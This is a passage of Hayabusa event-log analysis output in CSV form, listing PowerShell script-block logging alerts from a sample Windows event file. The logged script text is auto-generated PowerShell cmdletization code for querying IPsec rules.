([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') 
-contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) 
$__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) 
$__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') 
-contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewa",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.081 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"ment.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = 
$false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and 
(@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) 
$__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', 
$__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName 
)) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewa",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.081 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"llProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if 